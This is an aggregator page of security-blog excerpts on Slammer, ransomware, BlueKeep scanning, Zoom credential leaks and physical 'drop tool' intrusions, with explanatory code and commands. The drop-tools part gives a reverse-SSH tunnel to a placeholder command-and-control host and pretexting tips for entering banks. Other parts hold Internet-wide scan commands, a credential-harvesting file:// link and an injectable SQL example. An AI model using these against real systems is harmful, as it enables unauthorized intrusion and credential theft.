What's new around the internet


All dates and times are GMT.
ErrataRob | 2023-01-25 16:09:34 | I'm still bitter about Slammer (direct link)
Tags: Vulnerability, Guideline ★★

Today is the 20th anniversary of the Slammer worm. I'm still angry over it, so I thought I'd write up my anger. This post will be of interest to nobody; it's just me venting my bitterness and get-off-my-lawn!!

Back in the day, I wrote "BlackICE", an intrusion detection and prevention system that ran as both a desktop version and a network appliance. Most cybersec people from that time remember it as the desktop version, but the bulk of our sales came from the network appliance.

The network appliance competed against other IDSs of the time, such as Snort, an open-source product. For much of the cybersec industry, IDS *was* Snort -- they had no idea how intrusion detection could work other than as that product, because it was open-source.

My intrusion-detection technology was radically different. The thing that makes me angry is that I couldn't explain the differences to the community because they weren't technical enough. When Slammer hit, Snort and Snort-like products failed. Mine succeeded extremely well. Yet I didn't get credit for this.

The first difference is that I used a custom poll-mode driver instead of interrupts. This is now the norm in the industry, as with Linux NAPI drivers. The problem with interrupts is that a computer of that era could handle fewer than 50,000 interrupts per second. If network traffic arrived faster than that, the computer would hang, spending all its time in the interrupt handler and doing no other useful work. Turning off interrupts and instead polling for packets prevents this. The cost is that when the computer isn't heavily loaded with network traffic, polling wastes CPU and electrical power. Linux NAPI drivers switch between the two: interrupts when traffic is light, polling when traffic is heavy.

The consequence was that a typical machine of the time (dual Pentium IIIs) could handle 2 million packets per second running my software, far better than the 50,000 packets per second of the competitors. When Slammer hit, it filled a 1-gbps Ethernet with 300,000 packets per second. As a consequence, pretty much all other IDS products fell over. Those that survived were attached to slower links -- 100-mbps was still common at the time.

An industry luminary even gave a presentation at BlackHat saying that my claimed performance (2 million packets per second) was impossible, because everyone knew computers couldn't handle traffic that fast. I couldn't combat that, even by explaining with very small words "but we disable interrupts".

Now this is the norm. All network drivers are written with polling in mind. Specialized drivers like PF_RING and DPDK do even better, and network appliances are now built on them. Today you'd expect something like Snort to keep up rather than drown in interrupts. What makes me bitter is that back then, this was inexplicable magic. I wrote an article in PoC||GTFO 0x15 that shows how my portscanner masscan uses this kind of driver, if you want more info.
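To make the interrupt-vs-polling tradeoff concrete, here is a minimal sketch of a poll-mode receive loop. This is not the BlackICE driver: nic_rx_burst() is an invented stub standing in for whatever the hardware actually exposes (DPDK's rte_eth_rx_burst() is the modern equivalent), stubbed here so the sketch compiles and runs.

    /* Sketch of a poll-mode receive loop. No interrupts: the CPU
     * repeatedly asks the NIC for whole batches of packets, so the
     * per-packet cost is a few cycles, not a ~20-microsecond
     * interrupt round trip (the ~50K interrupts/sec ceiling). */
    #include <stdio.h>
    #include <stddef.h>
    #include <stdint.h>

    #define BURST 32

    struct pkt { const uint8_t *data; size_t len; };

    /* Stub for a hypothetical driver API: pretend the NIC delivers
     * a fixed number of packets, then goes quiet. */
    static size_t nic_rx_burst(struct pkt *pkts, size_t max)
    {
        static int remaining = 100;
        static const uint8_t payload[] = { 0x04, 0x01, 0x01 };
        size_t n = 0;
        while (n < max && remaining > 0) {
            pkts[n].data = payload;
            pkts[n].len = sizeof(payload);
            n++; remaining--;
        }
        return n;
    }

    static void analyze(const uint8_t *data, size_t len)
    {
        (void)data; (void)len;   /* IDS analysis would go here */
    }

    int main(void)
    {
        struct pkt pkts[BURST];
        size_t total = 0, n;
        while ((n = nic_rx_burst(pkts, BURST)) > 0) {
            for (size_t i = 0; i < n; i++)
                analyze(pkts[i].data, pkts[i].len);
            total += n;
        }
        printf("processed %zu packets\n", total);
        return 0;
    }

A real driver spins when the queue is empty (the wasted-CPU cost mentioned above), which is exactly the case NAPI-style hybrids handle by falling back to interrupts.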
The second difference in my product was how signatures were written. Everyone else used signatures that triggered on pattern-matching. My technology instead included protocol analysis: code that parsed more than 100 protocols. The difference is that when an exploit targets a buffer-overflow vulnerability, pattern-matching searches for patterns unique to that one exploit. In my case, we'd measure the length of the buffer and trigger when it exceeded a certain length, catching any attempt to attack the vulnerability.

The reason we could do this was the use of state-machine parsers. Such analysis was considered heavyweight and slow, which is why others avoided it. In fact, state machines are faster than pattern-matching, many times faster. Better and faster. Such parsers are no […]
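As an illustration of the state-machine approach (my sketch, not the actual BlackICE code; the protocol, delimiter, and limit are invented): the parser consumes one byte at a time, keeping only a state and a counter, and alerts when a field outgrows the buffer a vulnerable server would allocate -- catching every exploit of the overflow, not just known exploit patterns.

    /* Sketch: byte-at-a-time state machine that measures a field's
     * length and alerts when it exceeds a hypothetical safe limit. */
    #include <stdio.h>
    #include <stddef.h>

    #define FIELD_LIMIT 128            /* hypothetical buffer size */

    enum state { S_HEADER, S_FIELD, S_ALERT };

    struct parser { enum state st; size_t field_len; };

    /* Keeps no copy of the traffic, only (state, length), so it
     * still works when an attack is split across many packets. */
    static void feed(struct parser *p, const unsigned char *buf, size_t n)
    {
        for (size_t i = 0; i < n; i++) {
            switch (p->st) {
            case S_HEADER:
                if (buf[i] == ':') {   /* hypothetical delimiter */
                    p->st = S_FIELD;
                    p->field_len = 0;
                }
                break;
            case S_FIELD:
                if (++p->field_len > FIELD_LIMIT)
                    p->st = S_ALERT;   /* any overflow attempt */
                break;
            case S_ALERT:
                return;
            }
        }
    }

    int main(void)
    {
        struct parser p = { S_HEADER, 0 };
        unsigned char attack[600] = ":";   /* a ~600-byte field */
        feed(&p, attack, sizeof(attack));
        puts(p.st == S_ALERT ? "ALERT: overflow attempt" : "ok");
        return 0;
    }

Because the per-byte work is a switch and an increment, such a parser can run at wire speed, and unlike a regex over reassembled payloads it never needs to buffer the traffic.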
ErrataRob | 2021-07-14 20:49:05 | Ransomware: Quis custodiet ipsos custodes (direct link)
Tags: Ransomware, Vulnerability, Guideline

Many claim that "ransomware" is due to cybersecurity failures. That's not really true. We are adequately protecting users and computers. The failure is the inability of cybersecurity guardians to protect themselves. Ransomware doesn't make the news when it only accesses the files normal users have access to. The big ransomware news events happened because the ransomware elevated itself to "administrator" over the network, giving it access to all files, including online backups.

Generic improvements in cybersecurity will help only a little, because they don't specifically address this problem. Likewise, blaming ransomware on how it breached perimeter defenses (phishing, patches, password reuse) will produce only marginal improvements. Ransomware solutions need instead to look at the typical human-operated ransomware killchain, identify how attackers typically achieve "administrator" credentials, and fix those problems. In particular, large organizations need to redesign how they handle Windows "domains" and how they "segment" networks.

I read a lot of lazy op-eds on ransomware. Most of them claim the problem is due to some sort of moral weakness (laziness, stupidity, greed, slovenliness, lust). They suggest things like "taking cybersecurity more seriously" or "doing better at basic cyber hygiene". These are "unfalsifiable" -- things nobody would disagree with, meaning things the speaker doesn't really have to defend. They rest not upon technical authority but moral authority: anybody, regardless of technical qualifications, can have an opinion on ransomware as long as they phrase it in such terms.

Another flaw of these "unfalsifiable" solutions is that they are not measurable. There's no standard definition for "best practices" or "basic cyber hygiene", so there's no way to tell whether you're already doing such things, or how big a gap you must close to reach the standard. Worse, some people point to the "NIST Cybersecurity Framework" as the "basics" -- but that's a framework for all cybersecurity practices. In other words, anything short of doing everything possible is considered a failure to follow the basics.

In this post, I try to focus on specifics while keeping things broadly applicable. It's detailed enough that people will disagree with my solutions.

The thesis of this blogpost is that we are failing to protect "administrative" accounts. The big ransomware attacks happen because the hackers got administrative control over the network, usually the Windows domain admin. It's with administrative control that they can cause such devastation, reaching every file in the network while also deleting the backups.

The Kaseya attacks highlight this particularly well. The company produces a product used in turn by Managed Service Providers (MSPs) to administer the security of small and medium-sized businesses. Hackers found and exploited a vulnerability in the product, which gave them administrative control over more than 1,000 small and medium-sized businesses around the world.

The underlying problems start with the way the software gives indiscriminate administrative access over computers. Then, this software was written using standard software techniques, meaning with the standard vulnerabilities that most software has (such as "SQL injection"). It wasn't written in the paranoid, careful way you'd hope for in software that poses this much danger.

A good analogy is airplanes. A common joke about the "black box" flight recorders that survive airplane crashes is that maybe we should make the entire airplane out of that material. The reason we can't is that the airplane would be too heavy to fly. The same is true of software: airplane software is written with extreme paranoia, knowing that bugs can […]
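The post names "SQL injection" as the kind of standard vulnerability at issue. Here is a generic sketch of that bug class, with SQLite's C API chosen for concreteness -- nothing here is Kaseya's actual code, and the table and column names are invented. The vulnerable pattern pastes attacker-controlled input into the query string; the fix binds it as a parameter so it can never be parsed as SQL.

    /* Sketch of the SQL-injection bug class, using SQLite's C API. */
    #include <stdio.h>
    #include <sqlite3.h>

    /* BAD: attacker-controlled input spliced into the SQL text.
     * An input like  ' OR '1'='1  rewrites the query's meaning. */
    void lookup_bad(sqlite3 *db, const char *user)
    {
        char sql[256];
        snprintf(sql, sizeof(sql),
                 "SELECT role FROM users WHERE name = '%s'", user);
        sqlite3_exec(db, sql, NULL, NULL, NULL);
    }

    /* GOOD: the SQL text is constant; the input is bound as data
     * and can never be interpreted as SQL, whatever it contains. */
    void lookup_good(sqlite3 *db, const char *user)
    {
        sqlite3_stmt *stmt;
        if (sqlite3_prepare_v2(db, "SELECT role FROM users WHERE name = ?",
                               -1, &stmt, NULL) != SQLITE_OK)
            return;
        sqlite3_bind_text(stmt, 1, user, -1, SQLITE_TRANSIENT);
        while (sqlite3_step(stmt) == SQLITE_ROW) {
            /* read columns with sqlite3_column_text() etc. */
        }
        sqlite3_finalize(stmt);
    }

The "paranoid, careful" style the post asks for is largely the systematic use of the second pattern, plus the assumption that every input is hostile.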
ErrataRob | 2021-04-21 17:27:21 | Ethics: University of Minnesota's hostile patches (direct link)
Tags: Hack, Vulnerability

The University of Minnesota (UMN) got into trouble this week for a study in which researchers submitted deliberately vulnerable patches to open-source projects, to test whether hostile actors can hack things this way. After a UMN researcher submitted a crappy patch to the Linux kernel, kernel maintainers decided to rip out all recent UMN patches.

Both things can be true:
- Their study was an important contribution to the field of cybersecurity.
- Their study was unethical.

It's like Nazi medical research on victims in concentration camps, or U.S. military research on unwitting soldiers. The research can be wildly unethical and at the same time produce useful knowledge.

I'd agree that their paper is useful. I would not be able to immediately recognize their patches as adding a vulnerability -- and I'm an expert at such things.

In addition, the sorts of bugs it exploits show a way forward in the evolution of programming languages. It's not clear that a "safe" language like Rust would be the answer; Linux kernel programming requires tracking resources in ways that Rust would consider inherently "unsafe". Instead, the C language needs to evolve with better safety features and better static analysis. Specifically, we need to be able to annotate the parameters and return values of functions. For example, if a pointer can't be NULL, that needs to be documented as a non-nullable pointer. (Imagine if pointers, like integers, came in two flavors: ones that can sometimes be NULL and ones that never can.)

So I'm glad this paper exists. As a researcher, I'll likely cite it in the future. As a programmer, I'll be more vigilant in the future. In my own open-source projects, I should probably review some previous pull requests that I've accepted, since many of them have been of the same crappy quality: simply adding a (probably) unnecessary NULL-pointer check.

The next question is whether this is ethical. The paper claims sign-off from the university's IRB -- the Institutional Review Board that reviews the ethics of experiments. Universities created IRBs to deal with the fact that many medical experiments were done on unwilling or unwitting subjects, such as the Tuskegee Syphilis Study. All medical research must have IRB sign-off these days.

However, I think IRB sign-off for computer-security research is stupid. Things like masscanning the entire Internet are undecidable with traditional ethics. I regularly scan every device on the IPv4 Internet, including your own home router. If you paid attention to the packets your firewall drops, some of them would be from me. Some consider this a gross violation of basic ethics and get very upset that I'm scanning their computer. Others consider it the expected consequence of the end-to-end nature of the public Internet: there's an inherent social contract that you must be prepared to receive any packet from anywhere. Kerckhoffs' Principle from the 1800s suggests the core ethic of cybersecurity is exposure to such things rather than covering them up.

The point isn't to argue whether masscanning is ethical. The point is that it's undecided, and your IRB isn't going to answer the question better than anybody else.

But here's the thing about masscanning: I'm honest and transparent about it. My very first scan of the entire Internet came with a tweet: "BTW, this is me scanning the entire Internet". A lot of ethical questions in other fields come down to honesty. If you have to lie about it or cover it up, then th[…]
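Part of the annotation machinery the post calls for already exists as compiler extensions, though not in standard C. A minimal sketch, assuming GCC or Clang (the struct and function names are invented for illustration):

    /* Sketch: making nullability part of the function signature, so
     * the compiler rather than a human reviewer catches bogus NULL
     * handling. __attribute__((nonnull)) is a GCC/Clang extension;
     * _Nonnull and _Nullable are Clang qualifiers (enable
     * -Wnullability-completeness to require them everywhere). */
    #include <stddef.h>

    struct buf;    /* illustrative types, not from any real project */
    struct tree;
    struct node;

    /* Callers must not pass NULL for arguments 1 and 2; the compiler
     * warns when one provably does, and static analysis can flag an
     * "if (b == NULL)" check inside the function as dead code. */
    int buf_append(struct buf *b, const char *data, size_t len)
        __attribute__((nonnull(1, 2)));

    /* Clang's spelling: the contract rides on the pointer type.
     * tree_find() may return NULL; its tree argument may not be. */
    struct node *_Nullable tree_find(struct tree *_Nonnull t, int key);

Under such contracts, the UMN-style patch that "adds a (probably) unnecessary NULL-pointer check" would stand out mechanically, because the check would contradict the declared type.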
ErrataRob | 2020-05-19 18:03:23 | Securing work-at-home apps (direct link)
Tags: Spam, Vulnerability, Threat, Guideline ★★★

In today's post, I answer the following question:

    "Our customers' employees are now using our corporate application while working from home. They are concerned about security, protecting their trade secrets. What security feature can we add for these customers?"

The tl;dr answer: don't add gimmicky features. Instead, take this opportunity to do the security things you should already be doing, starting with a "vulnerability disclosure program", or "vuln program".

Gimmicks

First of all, I'd like to discourage you from adding security gimmicks to your product. You are no more likely to come up with an exciting new security feature on your own than with a miracle cure for covid. Your sales and marketing people may get excited about the feature, and they may get the customer excited about it too, but the excitement won't last.

Eventually, the customer's IT and cybersecurity teams will be brought in. They'll quickly identify your gimmick as snake oil, and you'll have made an enemy of them. They are already involved in securing the server side, the work-at-home desktop, the VPN, and all the other network essentials. You don't want them as your enemy, you want them as your friend. You don't want to send your salesperson into the maw of a technical meeting at the customer's site trying to defend the gimmick.

You want the opposite approach: do something the decision-maker on the customer side won't necessarily understand, but which their IT/cybersecurity people will get excited about. You want them in the background as your champion rather than as your opposition.

Vulnerability disclosure program

To accomplish the goal described above, the thing you want is known as a vulnerability disclosure program. If there's one thing the entire cybersecurity industry agrees on (other than hating the term "cybersecurity", preferring "infosec" instead), it's that you need a vulnerability disclosure program. Everything else you might do to add security to your product comes after you have this thing.

Your product has security bugs, known as vulnerabilities. This is true of everyone, no matter how good you are. Apple, Microsoft, and Google employ the brightest minds in cybersecurity, and they have vulnerabilities. Every month you update their products with the latest fixes for these vulnerabilities. I just bought a new MacBook Air and it's already telling me I need to update the operating system to fix bugs found after it shipped.

These bugs come mostly from outsiders. The companies have internal people searching for such bugs, as well as consultants, and do a good job quietly fixing what they find. But this goes only so far. Outsiders have a wider set of skills and perspectives than the companies could ever hope to gather themselves, so they find things the companies miss.

These outsiders are often not customers. This has been a chronic problem throughout the history of computers. Somebody calls up your support line and reports an obvious bug that hackers can easily exploit. The support representative ignores the report because it doesn't come from a customer -- after all, it's foolish to waste time adding features no customer is asking for. But then the bug leaks out to the public, hackers widely exploit it, damaging customers, and angry customers demand to know why you did nothing despite having been notified.

The problem here is that nobody has the job of responding to such reports. The reason your company dropped the ball is that nobody was assigned to pick it up. All a vulnerability disclosure program means is that at least one person within the company has the responsibility of dealing with it.

How to set up a vulnerability disclosure program […]
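The excerpt cuts off before the how-to. One widely adopted first step (my addition, not necessarily what the post goes on to recommend) is publishing a security.txt file per RFC 9116 at /.well-known/security.txt, so outside reporters can find the person whose job it now is:

    # Served at https://example.com/.well-known/security.txt
    # (RFC 9116; the domain and addresses are placeholders)
    Contact: mailto:security@example.com
    Expires: 2026-12-31T23:59:59Z
    Policy: https://example.com/security-policy
    Preferred-Languages: en

Contact and Expires are the two required fields; the rest are optional. The file is only useful if the mailbox it names is actually monitored by the person assigned to pick up the ball.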
ErrataRob | 2020-04-02 01:23:55 | About them Zoom vulns... (direct link)
Tags: Hack, Vulnerability, Threat

Today a couple of vulnerabilities were announced in Zoom, the popular work-from-home conferencing app. Hackers can possibly exploit these to do evil things to you, such as steal your password. Because of COVID-19, these vulns have hit the mainstream media, which means my non-techy friends and relatives have been asking about it. I thought I'd write up a blogpost answering their questions.

The short answer is that you don't need to worry about it. Unless you do bad things, like using the same password everywhere, it's unlikely to affect you. You should worry more about wearing pants on your Zoom video conferences in case you forget and stand up.

Now is a good time to remind people to stop using the same password everywhere and to visit https://haveibeenpwned.com to view all the accounts where they've had their password stolen. Using the same password everywhere is the #1 vulnerability the average person is exposed to, and it's a possible problem here. For critical accounts (Windows login, bank, email), use a different password for each. (Sure, for accounts you don't care about, use the same password everywhere; I use 'Foobar1234'.) Write these passwords down on paper and put that paper in a secure location. Don't print them, and don't store them in a file on your computer. Writing one on a Post-It note taped under your keyboard is adequate security if you trust everyone in your household.

If hackers use this Zoom method to steal your Windows password, you aren't in much danger. They can't log into your computer, because it's almost certainly behind a firewall. And they can't use the password on your other accounts, because it's not the same.

Why you shouldn't worry

The reason you shouldn't worry about this password-stealing problem is that it's everywhere, not just in Zoom. It's also here in the browser you are using. If you click on file://hackme.robertgraham.com/foo/bar.html, then I can grab your password in exactly the same way as if you clicked on that vulnerable link in Zoom chat. That's how the Zoom bug works: hackers post these evil links in the chat window during a Zoom conference. It's hard to say Zoom has a vulnerability when so many other applications have the same issue.

Many home ISPs block such connections to the Internet, including Comcast, AT&T, Cox, Verizon Wireless, and others. If this is the case, when you click on the above link, nothing will happen: your computer will try to contact hackme.robertgraham.com and fail. You may be protected without doing anything at all. If your ISP doesn't block such connections, you can configure your home router to do it: go into the firewall settings and block "TCP port 445 outbound". Alternatively, you can configure Windows to follow such links only within your home network, but not out to the Internet.

If hackers (like me, if you click on the above link) get your password, they probably can't use it. While your home Internet router allows outbound connections, it (almost always) blocks inbound connections. Thus, if I steal your Windows password, I can't use it to log into your home computer unless I also physically break into your house. And if I can break into your computer physically, I can hack it without knowing your password.

The same arguments apply to corporate desktops. Corporations should block such outbound connections. They […]
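For the "block TCP port 445 outbound" advice, router interfaces vary by vendor, but on Windows itself an equivalent rule can be added from an elevated command prompt. A sketch of the idea (the rule name is arbitrary; test on your own setup):

    rem Block outbound SMB so file:// links can't leak credentials to Internet hosts
    netsh advfirewall firewall add rule name="Block outbound SMB" dir=out action=block protocol=TCP remoteport=445

Note this blocks SMB to everything, including your own LAN; if you share files or printers between machines at home, you'd scope the rule with the remoteip parameter to exempt your local subnet.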
ErrataRob | 2019-05-29 20:16:09 | Your threat model is wrong (direct link)
Tags: Ransomware, Tool, Vulnerability, Threat, Guideline, FedEx, NotPetya

Several subjects have come up in the past week that all come down to the same thing: your threat model is wrong. Instead of addressing the threat that exists, you've morphed the threat into something you'd rather deal with, or which is easier to understand.

Phishing

An example is this question that misunderstands the threat of "phishing":

    "Should failing multiple phishing tests be grounds for firing? I ran into a guy at a recent conference, said his employer fired people for repeatedly falling for (simulated) phishing attacks. I talked to experts, who weren't wild about this disincentive. https://t.co/eRYPZ9qkzB pic.twitter.com/Q1aqCmkrWL" -- briankrebs (@briankrebs), May 29, 2019

The (wrong) threat model here is that phishing is an email that smart users with training can identify and avoid. This isn't true. Good phishing messages are indistinguishable from legitimate messages. Said another way, a lot of legitimate messages are in fact phishing messages, such as when HR sends out a message saying "log into this website with your organization username/password".

    "Recently, my university sent me an email for mandatory Title IX training, not digitally signed, with an external link to the training, that requested my university login creds for access, that was sent from an external address but from the Title IX coordinator." -- Tyler Pieron (@tyler_pieron), May 29, 2019

Yes, it's amazing how easily stupid employees are tricked by the most obvious of phishing messages, and you want to point and laugh at them. But frankly, you want the idiot employees doing this. The most obvious phishing attempts are the least harmful and a good test of the rest of your security -- which should be based on the assumption that users will frequently fall for phishing.

In other words, if you paid attention to the threat model, you'd be mitigating the threat in other ways and not even bothering to train employees. You'd be firing the HR idiots for phishing employees, not punishing employees for getting tricked. Your systems would be resilient against successful phishes, such as by using two-factor authentication.

IoT security

After the Mirai worm, government types pushed for laws to secure IoT devices, as billions of insecure devices like TVs, cars, security cameras, and toasters are added to the Internet. Everyone is afraid of the next Mirai-type worm. For example, they are pushing for devices to be auto-updated. But auto-updates are a bigger threat than worms.

Since Mirai, roughly 10 billion new IoT devices have been added to the Internet, yet there hasn't been a Mirai-sized worm. Why is that? After 10 billion new IoT devices, it's still Windows and not IoT that is the main problem. The answer is that number, 10 billion. Internet worms work by guessing IPv4 addresses, of which there are only 4 billion. You can't put 10 billion new devices on public IPv4 addresses because there simply aren't enough addresses. Instead, those 10 billion devices are almost entirely being put on private ne[tworks …]
ErrataRob | 2019-05-28 06:20:06 | Almost One Million Vulnerable to BlueKeep Vuln (CVE-2019-0708) (direct link)
Tags: Ransomware, Vulnerability, Threat, Patching, Guideline, NotPetya, Wannacry

Microsoft announced a vulnerability in its "Remote Desktop" product that can lead to robust, wormable exploits. I scanned the Internet to assess the danger. I found nearly 1 million devices on the public Internet that are vulnerable to the bug. That means when the worm hits, it'll likely compromise those million devices. This will likely lead to an event as damaging as WannaCry and notPetya from 2017 -- potentially worse, as hackers have since honed their skills exploiting these things for ransomware and other nastiness.

To scan the Internet, I started with masscan, my Internet-scale port scanner, looking for port 3389, the one used by Remote Desktop. This takes a couple of hours and lists all the devices running Remote Desktop -- in theory. It returned 7,629,102 results (over 7 million). However, there's a lot of junk out there that'll respond on this port; only about half are actually Remote Desktop.

masscan only finds the open ports; it isn't complex enough to check for the vulnerability, since Remote Desktop is a complicated protocol. A project was posted that could connect to an address and test whether it was patched or vulnerable. I took that project and optimized it a bit as rdpscan, then used it to scan the results from masscan. It's a thousand times slower, but it only has to scan the masscan results rather than the entire Internet.

The table of results is as follows:

    1,447,579  UNKNOWN    - receive timeout
    1,414,793  SAFE       - target appears patched
    1,294,719  UNKNOWN    - connection reset by peer
    1,235,448  SAFE       - CredSSP/NLA required
      923,671  VULNERABLE - got appid
      651,545  UNKNOWN    - FIN received
      438,480  UNKNOWN    - connect timeout
      105,721  UNKNOWN    - connect failed 9
       82,836  SAFE       - not RDP but HTTP
       24,833  UNKNOWN    - connection reset on connect
        3,098  UNKNOWN    - network error
        2,576  UNKNOWN    - connection terminated

The various UNKNOWN results fail for various reasons. Many are because the protocol isn't actually Remote Desktop and responds weirdly when we try to talk Remote Desktop. Many others are Windows machines, sometimes vulnerable and sometimes not, that for some reason return errors.

The important results are those marked VULNERABLE: 923,671 machines. That means we've confirmed the vulnerability really does exist, though it's possible a small number of these are "honeypots" deliberately pretending to be vulnerable in order to monitor hacker activity on the Internet.

The next results are those marked SAFE as probably "patched": 1,414,793 machines. This doesn't necessarily mean they are patched Windows boxes; they could instead be non-Windows systems that look the same as patched Windows boxes. Either way, they are safe from this vulnerability.

The next results are those marked SAFE due to CredSSP/NLA failures: 1,235,448 machines. This doesn't mean they are patched, only that we can't exploit them. They require "network level authentication" before we can talk Remote Desktop to them, so we can't test whether they are patched or vulnerable -- but neither can the hackers. They may still be exploitable by an insider threat who knows a valid username/password, but not by anonymous hackers or worms.

The next category is marked SAFE because they aren't Remote Desktop at all, but HTTP servers. In other words, in response to […]
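The two-stage pipeline described above looks roughly like this. This is a sketch: the flags are from the tools' documentation as I recall them, and the rate, file names, and exclude list are placeholders to adapt (masscan's -oL list format puts the IP in the fourth column of each "open" line).

    # Stage 1: fast Internet-wide sweep for anything listening on 3389
    masscan 0.0.0.0/0 -p3389 --rate 100000 --excludefile exclude.txt -oL rdp-hosts.txt

    # Stage 2: slow, per-host vulnerability test of only those hits
    awk '/open/ {print $4}' rdp-hosts.txt > ips.txt
    rdpscan --file ips.txt > results.txt

The design point is the asymmetry: the cheap scanner covers the whole address space in hours, so the expensive protocol-level check only has to touch the few million hosts that actually answered.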
ErrataRob | 2018-12-11 22:59:55 | Notes about hacking with drop tools (direct link)
Tags: Vulnerability

In this report, Kaspersky found Eastern European banks hacked with Raspberry Pis and "Bash Bunnies" (DarkVishnya). I thought I'd write up some more detailed notes on this.

Drop tools

A common hacking/pen-testing technique is to drop a box physically on the local network. On this blog, there are articles going back 10 years discussing this. In the old days, it was done with a $200 "netbook" (a cheap notebook computer). These days, it can be done with a $50 "Raspberry Pi" computer, or even a $25 consumer device reflashed with Linux.

A Raspberry Pi is a $35 single-board computer, to which you'll need to add about another $15 worth of stuff to get it running (power supply, flash drive, and cables). These are extremely popular hobbyist computers, used for everything from home servers to robotics to hacking. They have spawned a large number of clones, like the ODROID, Orange Pi, NanoPi, and so on. With a quad-core, 1.4 GHz, single-issue processor, 2 gigs of RAM, and typically at least 8 gigs of flash, these are pretty powerful computers.

Typically what you'd do is install Kali Linux, a Linux distro that contains all the tools hackers want to use. You then drop this box physically on the victim's network. We often called these "dropboxes" in the past, but now that there's a cloud service called Dropbox, that gets confusing, so I guess we can call them "drop tools". The advantage of using something like a Raspberry Pi is that it's cheap: once dropped on a victim's network, you probably won't ever get it back.

Gaining physical access to even secure banks isn't that hard. Sure, access to the money is tightly controlled, but other parts of the bank aren't nearly as secure. One good trick is to pretend to be a banking inspector. At least in the United States, they'll quickly bend over and spread them if they think you are a regulator. Or you can pretend to be a maintenance worker there to fix the plumbing. All it takes is a uniform with a logo and what appears to be a valid work order. If questioned, whip out the clipboard and ask them to sign off on the work. Or, if all else fails, just walk in brazenly as if you belong.

Once inside the physical network, you need to find a place to plug something in. Ethernet and power plugs are often underneath or behind furniture, so that's not hard. You might find access to a wiring closet somewhere, as Aaron Swartz famously did. You'll usually have to connect via Ethernet, since it requires no authentication/authorization. If you could connect via WiFi, you could probably do it from outside the building using directional antennas without going through all this.

Now that you've got your evil box installed, there is the question of how you remotely access it. It's almost certainly firewalled, preventing any inbound connection. One choice is to configure it for outbound connections. When doing pentests, I configure reverse SSH command-prompts back to a command-and-control server. Another alternative is to create an SSH Tor hidden service. There are myriad other ways you might do this. They all suffer the problem that anybody watching the organization's outbound traffic can notice these connections.

Another alternative is to use WiFi. This lets you sit physically outside in the parking lot and connect to the box. This can sometimes be detected by WiFi intrusion-prevention systems, though it's not hard to get around that. The downside is that it puts you in physical jeopardy, because you have to be near the building. You can mitigate this in some cases, such as by sticking a second Raspberry Pi in a nearby bar that is close enough to connect, and then using the bar's Internet connection to hop-scotch on in.
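The reverse-SSH approach mentioned above looks like this (hostnames, users, and ports are placeholders): the drop box dials out, so the victim's firewall sees only an ordinary outbound connection, and the operator rides that tunnel back in.

    # On the drop box: expose its own sshd as port 2222 on the C2 host
    # (-N: no remote command, just hold the tunnel open)
    ssh -N -R 2222:localhost:22 operator@c2.example.com

    # Later, on the C2 host: hop back into the drop box
    ssh -p 2222 pi@localhost

In practice you'd run the first command under autossh or a systemd unit so the tunnel reconnects when it drops -- which is also exactly the kind of persistent outbound connection that egress monitoring can catch.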
ErrataRob | 2018-11-04 18:22:46 | Brian Kemp is bad on cybersecurity (direct link)
Tags: Vulnerability, Threat, Guideline

I'd prefer a Republican governor, but as a cybersecurity expert, I have to point out how bad Brian Kemp (candidate for Georgia governor) is on cybersecurity. When notified about vulnerabilities in election systems, his response has been to shoot the messenger rather than fix the vulnerabilities. This was the premise behind the cybercrime bill earlier this year that was ultimately vetoed by the current governor after vocal opposition from cybersecurity companies. More recently, he announced that he's investigating the Georgia State Democratic Party for a "failed hacking attempt".

According to news stories, state election websites are full of common vulnerabilities, the kind documented in the OWASP Top 10, such as "direct object references" that would allow any election registration information to be read or changed -- allowing a hacker, for example, to cancel the registrations of the other party's voters.

Testing for such weaknesses is not a crime. Indeed, it's desirable that people can test for security weaknesses; systems that aren't open to testing are insecure. This concept is the basis for many policy initiatives at the federal level, which not only protect researchers probing for weaknesses from prosecution, but even provide bounties encouraging them to do so. The DoD has a "Hack the Pentagon" initiative encouraging exactly this.

But the State of Georgia is stereotypically backwards and thuggish. Earlier this year, the legislature passed SB 315, which criminalized merely attempting to access a computer without permission in order to probe for possible vulnerabilities. To the ignorant and backwards person, this seems reasonable: of course this bad activity should be outlawed. But as we in the cybersecurity community have learned over the last decades, this only outlaws your friends from finding security vulnerabilities, and does nothing to discourage your enemies. Russian election-meddling hackers are not deterred by such laws, only Georgia residents concerned about whether their government's websites are secure.

It's your own users, and well-meaning security researchers, who are the primary source of security improvements. Unless you live under a rock (like Brian Kemp, apparently), you'll have noticed that every month your Windows desktop or iPhone nags you about updating the software to fix security issues. If you look behind the scenes, you'll find that most of these security fixes come from outsiders: from technical experts who accidentally come across vulnerabilities, and from security researchers who specifically look for them.

It's because of this "research" that systems are mostly secure today. A few days ago was the 30th anniversary of the "Morris Worm" that took down the nascent Internet in 1988. The net of that time was hostile to security research, with major companies ignoring vulnerabilities. Systems then were laughably insecure, and vendors tried to address the problem by suppressing research. The Morris Worm exploited several vulnerabilities that were well known at the time but ignored by the vendor (in this case, primarily Sun Microsystems).

Since then, with a culture of outsiders disclosing vulnerabilities, vendors have been pressured into fixing them. This has led to vast improvements in security. I'm posting this from a public WiFi hotspot in a bar, for example, because computers are secure enough for this to be safe. 10 years ago, such activity wasn't safe.

The Georgia Democrats obviously have concerns about the integrity of election systems. They have every reason to thoroughly probe an elections website looking for vulnerabilities. This sort of activity should be encouraged, not supp[ressed …]
Last update at: 2024-05-02 14:07:57
See our sources.

To see everything: our RSS feed (filtered) | Twitter